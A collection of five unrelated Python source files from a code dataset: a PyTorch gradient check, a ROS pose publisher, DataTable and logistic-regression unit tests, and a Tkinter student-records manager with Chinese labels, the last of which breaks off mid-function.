+{"seq_id":"143607301","text":"import torch\nfrom torch.autograd import Variable\nfrom gcn.functions import GOF_Function, my_GOF_Function\nfrom torch.autograd import gradcheck\n\ndef cpu_gpu_check():\n gof = GOF_Function.apply\n # gof = my_GOF_Function()\n\n weight = torch.rand(2,2,4,3,3).double()\n gfb = torch.rand(4,3,3).double()\n\n weight_cpu = Variable(weight, requires_grad=True)\n weight_gpu = Variable(weight.cuda(), requires_grad=True)\n\n gfb_cpu = Variable(gfb, requires_grad=False)\n gfb_gpu = Variable(gfb.cuda(), requires_grad=False)\n\n # Forward results checking...\n print('-'*80)\n output_cpu = gof(weight_cpu, gfb_cpu)\n output_gpu = gof(weight_gpu, gfb_gpu)\n if torch.equal(output_cpu, output_gpu.cpu()):\n print(\"Forward results do agree!\")\n else:\n print(\"Forward results do not agree!\")\n print('Results on cpu:', output_cpu)\n print('Results on gpu:', output_gpu)\n \n # Backward results checking...\n 
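# Backpropagate matching all-ones upstream gradients through both copies, then compare weight grads.\n    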
print('-'*80)\n output_cpu.backward(torch.ones(output_cpu.size()).double())\n output_gpu.backward(torch.ones(output_gpu.size()).double().cuda())\n if torch.equal(weight_cpu.grad, weight_gpu.grad.cpu()):\n print(\"Backward grads do agree!\")\n else:\n print(\"Backward grads do not agree!\")\n print('Grad on cpu:', weight_cpu.grad)\n print('Grad on gpu:', weight_gpu.grad)\n\n # Gradcheck on cpu\n print('-'*80)\n print('Gradcheck on cpu:')\n inputs_cpu = (weight_cpu, gfb_cpu)\n test_cpu = gradcheck(gof, inputs_cpu, eps=1e-6, atol=1e-4, rtol=1e-3, raise_exception=True)\n print(test_cpu)\n\n # Gradcheck on gpu\n print('-'*80)\n print('Gradcheck on gpu:')\n inputs_gpu = (weight_gpu, gfb_gpu)\n test_gpu = gradcheck(gof, inputs_gpu, eps=1e-6, atol=1e-4, rtol=1e-3, raise_exception=True)\n print(test_gpu)\n\nif __name__ == \"__main__\":\n cpu_gpu_check()","sub_path":"gcn/functions/gradtest.py","file_name":"gradtest.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632539792","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nimport sys\nimport tf\nimport time\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\n\ndef plot_out(args):\n #time.sleep(10)\n rospy.init_node('portable_plot_out', anonymous=True)\n start_position_pub = rospy.Publisher('start_position', PoseWithCovarianceStamped, queue_size=10)\n goal_position_pub = rospy.Publisher('goal_position', PoseStamped, queue_size=10)\n detect_position_pub = rospy.Publisher('detect_position', PoseStamped, queue_size=10)\n\n if args[7] == 'start':\n rospy.loginfo(args[8] + \"_start_position plotout\")\n tmp_pose = PoseWithCovarianceStamped()\n num = 0\n r = rospy.Rate(5) # 10hz\n while num < 3:\n now = rospy.Time.now()\n tmp_pose.header.stamp = now\n tmp_pose.header.frame_id = args[8]\n tmp_pose.pose.pose.position.x = float(args[1]);\n tmp_pose.pose.pose.position.y = float(args[2]);\n tmp_pose.pose.pose.position.z = float(args[3]);\n quat = tf.transformations.quaternion_from_euler(float(args[6]), float(args[5]), float(args[4]))\n tmp_pose.pose.pose.orientation.x = quat[0];\n tmp_pose.pose.pose.orientation.y = quat[1];\n tmp_pose.pose.pose.orientation.z = quat[2];\n tmp_pose.pose.pose.orientation.w = quat[3];\n start_position_pub.publish(tmp_pose)\n num += 1\n r.sleep()\n\n elif args[7] == 'goal':\n rospy.loginfo(args[8] + \"_goal_position plotout\")\n tmp_pose = PoseStamped()\n num = 0\n r = rospy.Rate(5) # 10hz\n while num < 3:\n now = rospy.Time.now()\n tmp_pose.header.stamp = now\n tmp_pose.header.frame_id = args[8]\n tmp_pose.pose.position.x = float(args[1])\n tmp_pose.pose.position.y = float(args[2])\n tmp_pose.pose.position.z = float(args[3])\n quat = tf.transformations.quaternion_from_euler(float(args[6]), float(args[5]), float(args[4]))\n tmp_pose.pose.orientation.x = quat[0]\n tmp_pose.pose.orientation.y = quat[1]\n tmp_pose.pose.orientation.z = quat[2]\n tmp_pose.pose.orientation.w = quat[3]\n goal_position_pub.publish(tmp_pose)\n num += 1\n r.sleep()\n\n elif args[7] == 'detect':\n rospy.loginfo(args[8] + \"_detect_position plotout\")\n tmp_pose = PoseStamped()\n num = 0\n r = rospy.Rate(5) # 10hz\n while num < 3:\n now = rospy.Time.now()\n tmp_pose.header.stamp = now\n tmp_pose.header.frame_id = args[8]\n tmp_pose.pose.position.x = float(args[1])\n tmp_pose.pose.position.y = float(args[2])\n tmp_pose.pose.position.z = float(args[3])\n 
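# Build the orientation quaternion from Euler angles (args[6]=roll, args[5]=pitch, args[4]=yaw).\n            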
quat = tf.transformations.quaternion_from_euler(float(args[6]), float(args[5]), float(args[4]))\n tmp_pose.pose.orientation.x = quat[0]\n tmp_pose.pose.orientation.y = quat[1]\n tmp_pose.pose.orientation.z = quat[2]\n tmp_pose.pose.orientation.w = quat[3]\n detect_position_pub.publish(tmp_pose)\n num += 1\n r.sleep()\n\nif __name__ == '__main__':\n try:\n plot_out(sys.argv)\n except rospy.ROSInterruptException: pass\n","sub_path":"tms_rc/tms_rc_pot/scripts/portable_plotout.py","file_name":"portable_plotout.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"308109341","text":"# -*- coding: us-ascii -*-\n\"\"\"Unit and regression tests for the statcode5 module.\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom StringIO import StringIO\n\nfrom pyAirviro.other.datatable import DataTable\nfrom pyAirviro.other.exceptions import DataTableException\nimport pyAirviro.tests\n\n\nDATATABLE = \"\"\"\\\n#semicolon separated datatable content\n#with header without units\nint1;int2;str3;float4;float5;str6\n1;2;test1;3.14;4.323;hej\n1;2;test2;-3.234;4.323;hopp\n2;2;test3;4.323;3e-12;hej\n\"\"\"\n\nDATATABLE_WITH_UNITS = \"\"\"\\\n#semicolon separated datatable content\n#with header without units\nint1 [unit1];int2 [unit2];str3;float4 [unit4];float5 [unit5];str6\n1;2;test1;3.14;4.323;hej\n1;2;test2;-3.234;4.323;hopp\n2;2;test3;4.323;3e-12;hej\n\"\"\"\n\nSMALL_DATATABLE = \"\"\"\\\nc1;c2\n1;2\n2;3\n3;4\n\"\"\"\n\n\nclass DataTableTests(pyAirviro.tests.TestCase):\n\n \"\"\"Unit and regression tests for the DataTable class.\"\"\"\n\n def test_read_data_table(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n self.assertEqual(table.listIds(),\n ['int1', 'int2', 'str3', 'float4', 'float5', 'str6'])\n self.assertEqual(table.colIndex['float5'], 4)\n\n def test_read_data_table_with_units(self):\n stream = StringIO(DATATABLE_WITH_UNITS)\n table = DataTable()\n table.read(stream, delimiter=\";\", units=True, unitDelimiter='[]')\n self.assertEqual(table.desc[3]['units'], 'unit4')\n self.assertTrue('units' not in table.desc[2])\n\n def test_look_up(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.setKeys(['int1', 'int2'])\n self.assertEqual(table.lookup('str3', ['2', '2']), 'test3')\n\n def test_convert_type(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.setKeys(['int1', 'int2'])\n table.convertCol('int1', int)\n table.convertCol('float4', float)\n self.assertEquals(table.lookup('float4', [2, '2']), 4.323)\n\n def test_accumulate(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.setKeys(['int1', 'int2'])\n table.convertCol('int1', int)\n table.convertCol('int2', int)\n table.convertCol('float4', float)\n matchingRows = table.rowIndices([1, 2])\n accumulated = sum(\n [table.data[row_index][table.colIndex['float4']]\n for row_index in matchingRows])\n row = table.accumulate([1, 2], method='sum', colIds=['float4'])\n self.assertEqual(row[table.colIndex['float4']], accumulated)\n self.assertEquals(table.lookup('float4', [2, 2]), 4.323)\n\n def test_filtered(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n filtered_table = table.filtered({'str6': 'hej'})\n self.assertEqual(filtered_table.data[-1][0], '2')\n\n def test_write(self):\n stream = 
StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n outstream = StringIO()\n table.write(outstream, delimiter=';')\n outstream.seek(0)\n table2 = DataTable()\n table2.read(outstream, delimiter=';')\n for rownr, row in enumerate(table.data):\n self.assertEqual(row, table2.data[rownr])\n\n def test_add_row(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.convertCol('float4', float)\n table.convertCol('float5', float)\n table.addRow(['4', '5', 'test4', 34.2, 23.0, 'hopp'])\n self.assertEqual(table.ncols, 6)\n\n self.assertRaises(DataTableException, table.addRow,\n [4, '5', 'test4', 34.2, 23, 'hopp'])\n\n def test_add_col_remove_col(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.addCol({'id': 'newCol1', 'type': int}, 1)\n table.addCol({'id': 'newCol2', 'type': int}, range(table.nrows))\n table.addCol({'id': 'newCol3', 'type': int})\n self.assertEqual(table.ncols, 9)\n self.assertRaises(DataTableException, table.addRow,\n [4, '5', 'test4', 34.2, 23, 'hopp'])\n table.setKeys(['int1', 'int2'])\n self.assertEqual(table.lookup('newCol1', ['2', '2']), 1)\n self.assertEqual(table.lookup('newCol2', ['2', '2']), 2)\n self.assertTrue(table.lookup('newCol3', ['2', '2']) is None)\n self.assertEqual(table.ncols, 9)\n table.removeCols(['newCol1'])\n self.assertEqual(table.ncols, 8)\n\n def test_sort_rows(self):\n stream = StringIO(DATATABLE)\n desc = [{'id': 'int1', 'type': int},\n {'id': 'int2', 'type': int},\n {'id': 'str3', 'type': unicode},\n {'id': 'float4', 'type': float}]\n table = DataTable(desc=desc)\n table.read(stream, delimiter=\";\")\n table.sortRows(order_by=['float4', 'int1'])\n self.assertEquals(table.data[0][3], -3.234)\n\n def test_join(self):\n stream1 = StringIO(DATATABLE)\n stream2 = StringIO(SMALL_DATATABLE)\n table1 = DataTable()\n table1.read(stream1, delimiter=\";\")\n table2 = DataTable()\n table2.read(stream2, delimiter=\";\")\n table2.setKeys(['c1'])\n table1.join(table2, keyMap={'c1': 'int1'}, addCols=['c2'])\n table1.setKeys(['int1'])\n self.assertEqual(table1.lookup('c2', ['1']), '2')\n","sub_path":"pyAirviro/tests/other/test_datatable.py","file_name":"test_datatable.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262862960","text":"__author__ = 'chaomai'\n\nimport unittest\nimport csv\nimport LogisticRegression as lr\n\n\nclass LogisticRegressionTestCase(unittest.TestCase):\n def getData(self):\n samples = []\n labels = []\n with open('data.txt', mode='r') as dataFile:\n reader = csv.reader(dataFile, delimiter=',', lineterminator='\\n')\n for r in reader:\n labels.append(r.pop(len(r) - 1))\n samples.append(r)\n\n return samples, labels\n\n def testTrain(self):\n samples, labels = self.getData()\n l = lr.LogisticRegression()\n l.train(samples, labels)\n\n def testPredict(self):\n samples, labels = self.getData()\n l = lr.LogisticRegression()\n l.train(samples, labels)\n p = l.predict(samples)\n print(p)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"StatisticalLearning/LogisticRegression/LogisticRegressionUnitTest.py","file_name":"LogisticRegressionUnitTest.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"116223397","text":"import io\nimport pickle\nimport time\nfrom tkinter import *\nfrom tkinter import 
simpledialog, ttk, messagebox\n\nfrom Student import *\n\nxueji = []\n\ndef test(a):\n print(a)\n\ndef file_new():\n xj = open('学生管理系统/xueji.stu','wb')\n pickle.dump(xueji,xj)\n xj.close\n \ndef file_read():\n global xueji\n try:\n xj = open('学生管理系统/xueji.stu','rb')\n xueji = pickle.load(xj)\n xj.close()\n return 1\n except:\n return 0\n\ndef file_save():\n xj = open('学生管理系统/xueji.stu','wb')\n pickle.dump(xueji,xj)\n xj.close\n\ndef star():\n z = file_read()\n if z == 0:\n file_new()\n print('学籍文件无法读取,已新建!')\n elif z == 1:\n print('初始化完成')\n\ndef add(id,name,gender,discipline,home,phonenumber):\n global xueji\n id = id\n name = name\n gender = gender\n discipline = discipline\n home = home\n phonenumber = phonenumber\n new = Student(id = id,name = name,gender = gender,discipline = discipline,home = home,phonenumber = phonenumber)\n xueji.append(new)\n file_save()\n\ndef score_input():\n global xueji\n id = input('请输入学生学号:')\n z = 0\n for i in range(len(xueji)):\n if xueji[i].id() == id:\n z = 1\n print('学号:',xueji[i].id(),'姓名:',xueji[i].name(),'性别:',xueji[i].gender())\n y = input('请确认信息:(y/n)')\n while y != 'y' and y != 'n':\n y = input('输入有误,请重新输入!')\n if y == 'y':\n score = eval(input('请输入该学生的分数:'))\n xueji[i].score_input(score)\n file_save()\n print('录入成功!\\n''学号:',xueji[i].id(),'姓名:',xueji[i].name(),'性别:',xueji[i].gender(),'成绩:',xueji[i].score())\n elif y == 'n':\n print('已取消')\n if z == 0:\n print('查无此人!')\n\ndef colorreturn():\n b1.config(bg = 'white')\n b2.config(bg = 'white')\n b3.config(bg = 'white')\n b4.config(bg = 'white')\n\ndef changeto_b1():\n global r1c1\n def delete(id):\n if messagebox.askyesno('敏感操作!','确认删除此学生吗?'):\n for i in range(len(xueji)):\n if xueji[i].id() == id:\n del xueji[i]\n file_save()\n add_all()\n\n def menu(event):\n if len(list1.selection()) == 1:\n menubar.post(event.x_root,event.y_root)\n elif len(list1.selection()) > 1:\n menubar.entryconfig('修改',state = DISABLED)\n menubar.post(event.x_root,event.y_root)\n\n def seach(choose,seach):\n clear()\n if choose == 0:\n for i in range(len(xueji)):\n if xueji[i].id() == seach:\n list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n elif choose == 1:\n for i in range(len(xueji)):\n if xueji[i].name() == seach:\n list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n elif choose == 2:\n for i in range(len(xueji)):\n if xueji[i].name()[0] == seach:\n list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n\n def add_all():\n clear()\n for i in range(len(xueji)):\n list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n\n def clear():\n x = list1.get_children()\n for i in x:\n list1.delete(i)\n\n def namechange():\n newname = simpledialog.askstring('修改名字','新名字:')\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list1.item(list1.selection(),\"values\")[0]:\n xueji[i].name_change(newname)\n file_save()\n add_all()\n\n def disciplinehange1(newname,top):\n if newname != '':\n for i in range(len(xueji)):\n if xueji[i].id() == list1.item(list1.selection(),\"values\")[0]:\n xueji[i].discipline_change(newname)\n file_save()\n add_all()\n top.destroy()\n\n def disciplinechange():\n top = Tk()\n top.title('修改专业')\n x = top.winfo_width()\n y = top.winfo_height()\n 
weizhi = '+%d+%d' % ((pmx-x)/2,(pmy-y)/2)\n        top.geometry(weizhi)\n\n        home = ttk.Combobox(top,width = 18)\n        home.grid(row = 0,column = 0,padx = 2)\n        home['value'] = ('计算机科学与技术','物理学','经济学','生物学')\n        Button(top,text = '确认',command = lambda:disciplinehange1(home.get(),top)).grid(row = 0,column = 1,padx = 2)\n\n        top.mainloop()\n\n    def phonenumberchange():\n        newname = simpledialog.askinteger('修改电话号码','新电话号码:')\n        if newname != None:\n            for i in range(len(xueji)):\n                if xueji[i].id() == list1.item(list1.selection(),\"values\")[0]:\n                    xueji[i].phonenumber_change(newname)\n                    file_save()\n                    add_all()\n\n    def homechange1(newname,top):\n        if newname != '':\n            for i in range(len(xueji)):\n                if xueji[i].id() == list1.item(list1.selection(),\"values\")[0]:\n                    xueji[i].home_change(newname)\n                    file_save()\n                    add_all()\n            top.destroy()\n\n    def homechange():\n        top = Tk()\n        top.title('修改生源地')\n        x = top.winfo_width()\n        y = top.winfo_height()\n        weizhi = '+%d+%d' % ((pmx-x)/2,(pmy-y)/2)\n        top.geometry(weizhi)\n\n        home = ttk.Combobox(top,width = 18)\n        home.grid(row = 0,column = 0,padx = 2)\n        home['value'] = ('北京市','天津市','上海市','重庆市','河北省','山西省','辽宁省','吉林省','黑龙江省','江苏省','浙江省','安徽省','福建省','江西省','山东省','河南省','湖北省','湖南省','广东省','海南省','四川省','贵州省','云南省','陕西省','甘肃省','青海省','台湾省','内蒙古自治区','广西壮族自治区','西藏自治区','宁夏回族自治区','新疆维吾尔自治区','香港特别行政区','澳门特别行政区')\n        Button(top,text = '确认',command = lambda:homechange1(home.get(),top)).grid(row = 0,column = 1,padx = 2)\n\n        top.mainloop()\n\n\n    r1c1.destroy()\n    r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n    r1c1.grid(row = 0,column = 1,sticky = N)\n    r1c1.grid_propagate(0)\n    colorreturn()\n    b1.config(bg = 'RoyalBlue')\n    #row1\n    r1c1_up = Frame(r1c1,bg = 'RoyalBlue')\n    r1c1_up.grid(row = 0,column = 0,sticky = W)\n    r1c1_dumn = Frame(r1c1,bg = 'RoyalBlue')\n    r1c1_dumn.grid(row = 1,column = 0)\n\n    #r1c1_up\n    seachentry = Entry(r1c1_up)\n    seachentry.grid(row = 0,column = 0,padx = 44)\n    choose = ttk.Combobox(r1c1_up)\n    choose.grid(row = 0,column = 1,sticky = W,padx = 0)\n    choose['value'] = ('学号','姓名','姓氏')\n    choose.current(0)\n    Button(r1c1_up,text = '搜索',command = lambda:seach(choose.current(),seachentry.get())).grid(row = 0,column = 2,sticky = W,padx = 40,pady = 7)\n    Button(r1c1_up,text = '撤销搜索',command = add_all).grid(row = 0,column = 3,sticky = W,padx = 0,pady = 7)\n\n    #r1c1_dumn\n    list1 = ttk.Treeview(r1c1_dumn,show = 'headings',column = ['学号','姓名','性别','专业','电话','生源地'],height = 21)\n    list1.column('学号',width = 100,anchor = CENTER)\n    list1.column('姓名',width = 100,anchor = CENTER)\n    list1.column('性别',width = 100,anchor = CENTER)\n    list1.column('专业',width = 120,anchor = CENTER)\n    list1.column('电话',width = 100,anchor = CENTER)\n    list1.column('生源地',width = 120,anchor = CENTER)\n    list1.heading('学号',text = '学号')\n    list1.heading('姓名',text = '姓名')\n    list1.heading('性别',text = '性别')\n    list1.heading('专业',text = '专业')\n    list1.heading('电话',text = '电话')\n    list1.heading('生源地',text = '生源地')\n    for i in range(len(xueji)):\n        list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n    list1.pack(padx = 44)\n\n    menubar = Menu(list1,tearoff = 0)\n\n    menubar1 = Menu(menubar,tearoff = 0)\n    if identity == 'admin':\n        menubar1.add_command(label = '名字',command = namechange)\n        menubar1.add_command(label = '专业',command = disciplinechange)\n        menubar1.add_command(label = '电话',command = phonenumberchange)\n        menubar1.add_command(label = '生源地',command = homechange)\n    else:\n        menubar1.add_command(label = '电话',command = phonenumberchange)\n\n    
menubar.add_cascade(label = '修改',menu = menubar1)\n if identity == 'admin':\n menubar.add_command(label = '删除',command = lambda:delete(list1.item(list1.selection(),\"values\")[0]))\n \n list1.bind('',menu)\n\ndef changeto_b2():\n global r1c1\n def menu(event):\n if identity == 'admin':\n if len(list2.selection()) == 1:\n menubar.post(event.x_root,event.y_root)\n elif len(list2.selection()) > 1:\n menubar.entryconfig('修改',state = DISABLED)\n menubar.post(event.x_root,event.y_root)\n\n def seach(choose,seach):\n clear()\n if choose == 0:\n for i in range(len(xueji)):\n if xueji[i].id() == seach:\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n elif choose == 1:\n for i in range(len(xueji)):\n if xueji[i].name() == seach:\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n elif choose == 2:\n for i in range(len(xueji)):\n if xueji[i].discipline() == seach:\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n\n def add_all():\n clear()\n for i in range(len(xueji)):\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n\n def clear():\n x = list2.get_children()\n for i in x:\n list2.delete(i)\n\n def chinesechange():\n newname = simpledialog.askinteger('修改分数','修改为:',minvalue = 0,maxvalue = 100)\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list2.item(list2.selection(),\"values\")[0]:\n xueji[i].chinesescore_change(newname)\n file_save()\n add_all()\n\n def mathchange():\n newname = simpledialog.askinteger('修改分数','修改为:',minvalue = 0,maxvalue = 100)\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list2.item(list2.selection(),\"values\")[0]:\n xueji[i].mathscore_change(newname)\n file_save()\n add_all()\n\n def englishchange():\n newname = simpledialog.askinteger('修改分数','修改为:',minvalue = 0,maxvalue = 100)\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list2.item(list2.selection(),\"values\")[0]:\n xueji[i].englishscore_change(newname)\n file_save()\n add_all()\n\n def physicschange():\n newname = simpledialog.askinteger('修改分数','修改为:',minvalue = 0,maxvalue = 100)\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list2.item(list2.selection(),\"values\")[0]:\n xueji[i].physicsscore_change(newname)\n file_save()\n add_all()\n\n r1c1.destroy()\n #row1\n r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n r1c1.grid(row = 0,column = 1,sticky = N)\n r1c1.grid_propagate(0)\n colorreturn()\n\n #r1c1\n r1c1_up = Frame(r1c1,bg = 'RoyalBlue')\n r1c1_up.grid(row = 0,column = 0,sticky = W)\n r1c1_dumn = Frame(r1c1,bg = 'RoyalBlue')\n r1c1_dumn.grid(row = 1,column = 0)\n\n #r1c1_up\n seachentry = Entry(r1c1_up)\n seachentry.grid(row = 0,column = 0,padx = 44)\n choose = ttk.Combobox(r1c1_up)\n choose.grid(row = 0,column = 1,sticky = W,padx = 0)\n choose['value'] = ('学号','姓名','专业')\n choose.current(0)\n Button(r1c1_up,text = '搜索',command = lambda:seach(choose.current(),seachentry.get())).grid(row = 0,column = 2,sticky = W,padx = 40,pady = 7)\n Button(r1c1_up,text = '撤销搜索',command = add_all).grid(row = 
0,column = 3,sticky = W,padx = 0,pady = 7)\n\n #r1c1_dumn\n b2.config(bg = 'RoyalBlue')\n list2 = ttk.Treeview(r1c1_dumn,show = 'headings',column = ['学号','姓名','专业','大学语文','高等数学','大学英语','大学物理'],height = 21)\n list2.column('学号',width = 86,anchor = CENTER)\n list2.column('姓名',width = 86,anchor = CENTER)\n list2.column('专业',width = 120,anchor = CENTER)\n list2.column('大学语文',width = 86,anchor = CENTER)\n list2.column('高等数学',width = 86,anchor = CENTER)\n list2.column('大学英语',width = 86,anchor = CENTER)\n list2.column('大学物理',width = 86,anchor = CENTER)\n list2.heading('学号',text = '学号')\n list2.heading('姓名',text = '姓名')\n list2.heading('专业',text = '专业')\n list2.heading('大学语文',text = '大学语文')\n list2.heading('高等数学',text = '高等数学')\n list2.heading('大学英语',text = '大学英语')\n list2.heading('大学物理',text = '大学物理')\n for i in range(len(xueji)):\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n list2.pack(padx = 44)\n\n menubar = Menu(list2,tearoff = 0)\n\n menubar1 = Menu(menubar,tearoff = 0)\n menubar1.add_command(label = '大学语文',command = chinesechange)\n menubar1.add_command(label = '高等数学',command = mathchange)\n menubar1.add_command(label = '大学英语',command = englishchange)\n menubar1.add_command(label = '大学物理',command = physicschange)\n\n menubar.add_cascade(label = '修改',menu = menubar1)\n list2.bind('',menu)\n\ndef changeto_b3():\n global r1c1\n r1c1.destroy()\n #row1\n r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n r1c1.grid(row = 0,column = 1,sticky = N)\n r1c1.grid_propagate(0)\n colorreturn()\n b3.config(bg = 'RoyalBlue')\n\n namelabel = Label(r1c1,text = '姓名:',bg = 'RoyalBlue')\n namelabel.grid(padx = 20,pady = 20,row = 0,column = 0)\n\n name = Entry(r1c1)\n name.grid(row = 0,column = 1)\n\n genderlabel = Label(r1c1,text = '性别:',bg = 'RoyalBlue')\n genderlabel.grid(padx = 20,row = 0,column = 2)\n\n gender = ttk.Combobox(r1c1,width = 18)\n gender.grid(row = 0,column = 3,padx = 2)\n gender['value'] = ('男','女')\n\n\n idlabel = Label(r1c1,text = '学号:',bg = 'RoyalBlue')\n idlabel.grid(pady = 20,row = 1,column = 0)\n\n id = Entry(r1c1)\n id.grid(row = 1,column = 1)\n\n disciplinelabel = Label(r1c1,text = '专业:',bg = 'RoyalBlue')\n disciplinelabel.grid(row = 1,column = 2)\n\n discipline = ttk.Combobox(r1c1,width = 18)\n discipline.grid(row = 1,column = 3)\n discipline['value'] = ('计算机科学与技术','物理学','经济学','生物学')\n\n phonenumberlabel = Label(r1c1,text = '电话:',bg = 'RoyalBlue')\n phonenumberlabel.grid(pady = 20,row = 2,column = 0)\n\n phonenumber = Entry(r1c1)\n phonenumber.grid(row = 2,column = 1)\n\n homelabel = Label(r1c1,text = '生源地:',bg = 'RoyalBlue')\n homelabel.grid(row = 2,column = 2)\n\n home = ttk.Combobox(r1c1,width = 18)\n home.grid(row = 2,column = 3,padx = 2)\n home['value'] = ('北京市','天津市','上海市','重庆市','河北省','山西省','辽宁省','吉林省','黑龙江省','江苏省','浙江省','安徽省','福建省','江西省','山东省','河南省','湖北省','湖南省','广东省','海南省','四川省','贵州省','云南省','陕西省','甘肃省','青海省','台湾省','内蒙古自治区','广西壮族自治区','西藏自治区','宁夏回族自治区','新疆维吾尔自治区','香港特别行政区','澳门特别行政区')\n\n\n Button(r1c1,text = '清空',width = 20).grid(row = 3,column = 1,pady = 20)\n Button(r1c1,text = '录入',width = 20,command = lambda:add(name = name.get(),gender = gender.get(),id = id.get(),discipline = discipline.get(),phonenumber = phonenumber.get(),home = home.get())).grid(row = 3,column = 3,pady = 20) \n\ndef changeto_b4():\n def pwdchange():\n prompt1.set('')\n prompt2.set('')\n prompt3.set('')\n if oldpwd.get() == xueji[who].password():\n if 
newpwd1.get() == newpwd2.get():\n xueji[who].password_change(newpwd1.get())\n file_save()\n prompt1.set('修改成功')\n prompt2.set('修改成功')\n prompt3.set('修改成功')\n\n else:\n prompt2.set('这里必须相同!')\n prompt3.set('这里必须相同!')\n else:\n prompt1.set('原密码错误!')\n \n def loadout():\n win.destroy()\n f = open('学生管理系统/load','rb')\n tlist = pickle.load(f)\n f.close()\n f = open('学生管理系统/load','wb')\n tlist[1] = '0'\n pickle.dump(tlist,f)\n f.close()\n\n global r1c1\n r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n r1c1.grid(row = 0,column = 1,sticky = N)\n r1c1.grid_propagate(0)\n r1c1.grid_propagate(0)\n colorreturn()\n b4.config(bg = 'RoyalBlue')\n\n Label(r1c1,text = '原密码:',bg = 'RoyalBlue').grid(row = 0,column = 0,padx = 40,pady = 30)\n oldpwd = Entry(r1c1)\n oldpwd.grid(row = 0,column = 1,padx = 40,pady = 30)\n prompt1 = StringVar()\n Label(r1c1,textvariable = prompt1,bg = 'RoyalBlue').grid(row = 0,column = 2)\n \n Label(r1c1,text = '新密码:',bg = 'RoyalBlue').grid(row = 1,column = 0,padx = 40,pady = 30)\n newpwd1 = Entry(r1c1)\n newpwd1.grid(row = 1,column = 1,padx = 40,pady = 30)\n prompt2 = StringVar()\n Label(r1c1,textvariable = prompt2,bg = 'RoyalBlue').grid(row = 1,column = 2)\n\n Label(r1c1,text = '确认密码:',bg = 'RoyalBlue').grid(row = 2,column = 0,padx = 40,pady = 30)\n newpwd2 = Entry(r1c1)\n newpwd2.grid(row = 2,column = 1,padx = 40,pady = 30)\n prompt3 = StringVar()\n Label(r1c1,textvariable = prompt3,bg = 'RoyalBlue').grid(row = 2,column = 2)\n\n\n tb = Button(r1c1,text = '修改密码',command = pwdchange)\n tb.grid(row = 3,column = 0,columnspan = 2,padx = 40,pady = 30)\n if identity == 'admin':\n tb.config(state = DISABLED)\n Button(r1c1,text = '退出登录',command = loadout).grid(row = 4,column = 0,columnspan = 2,padx = 40,pady = 10)\n\ndef loadcheck():\n global x\n global who\n global identity\n for i in range(len(xueji)):\n if username.get() == xueji[i].id() and password.get() == xueji[i].password():\n x = 1\n who = i\n identity = 'stu'\n if z.get() == '1':\n tlist = [z.get(),y.get(),username.get(),password.get()]\n f = open('学生管理系统/load','wb')\n pickle.dump(tlist,f)\n f.close()\n elif z.get() == '0':\n tlist = [z.get(),y.get(),'','']\n f = open('学生管理系统/load','wb')\n 